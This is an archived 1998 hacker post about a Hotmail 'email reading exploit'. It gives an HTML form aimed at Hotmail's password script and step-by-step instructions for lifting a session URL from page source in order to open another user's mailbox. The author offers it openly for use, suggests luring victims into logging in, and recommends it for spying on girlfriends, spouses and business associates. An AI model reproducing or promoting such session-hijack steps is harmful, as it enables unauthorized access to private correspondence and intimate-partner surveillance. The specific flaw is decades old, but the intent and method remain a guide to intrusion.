TUCoPS :: Web :: Specific Sites :: hotmail6.txt

Hotmail Email Reading Exploit 


[ http://www.rootshell.com/ ]

From administrator@airmail.net Fri Jul 24 16:37:22 1998
Date: Fri, 24 Jul 1998 02:57:00 -0500
From: Security Administrator - kM <administrator@airmail.net>
Reply-To: km@hackersclub.com
To: www-request@rootshell.com
Subject: Hotmail E-Mail Reading exploit

Although someone submitted this to me it was incomplete and really
didn't explain all that well this new hotmail exploit.  I can not take
full credit for it but I just want to make it more pubicly known.

Basically you can read anyone who owns a hotmail account that either
forgets to logout or is currently logged in reading email.  Basically
here is how it works..

If you want to get into a hotmail account first you need to find a
victim.  Everyone has a hotmail account especially peeps on IRC or any
local chat channel hangout.  Send an email to them and tell them to
check their hotmail account.   Then type their name below and access
their email at the same time.

Good for checking up on cheating girlfriends, boyfriends,  wives,
husbands.
Business associates etc etc.

Step 1

Enter the hotmail ID you want to hack.  (remember this) this hack
attempt ONLY
works if the user has not LOGGED out of hotmail.  If the user has logged
out this attempt
will not be successful and you will get a message saying you were logged
out.


  Type in there user name here
  
  <FORM method="post"
action="http://www.hotmail.com/cgi-bin/password.cgi">
  Type in there user name here
  <INPUT type="text" name="login" size="16" maxlength="16">
  <INPUT type=submit value="enter">
  <INPUT type="hidden" name="curmbox" value="active">
</FORM>


Make sure you have typed the username exactly right because hotmail will
not tell you if you have typed it incorrectly, they also log the IP's of
people entering incorrect login names.


Step 2

It is now time to view the html source code of the password page that
you are
on now. View the source for this page. Five lines down or so from the
top
of the source code page, it will say

<FORM name="passwordform"
Action="http://somenumber/cgi-bin//start/username/anothernumber"
method="POST"
target="_top">

Step 3

Goto the address in the action part of this code. 
http://somenumber/cgi-bin//start/username/anothernumber
If the hotmail user didn't logout, you will have access to their
mailbox.  
If they logged out try another. 

If you like, I have setup a website with a more user-friendly interface.

http://www.hackersclub.com/km/library/hack/hotmail_hack.html

kM

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH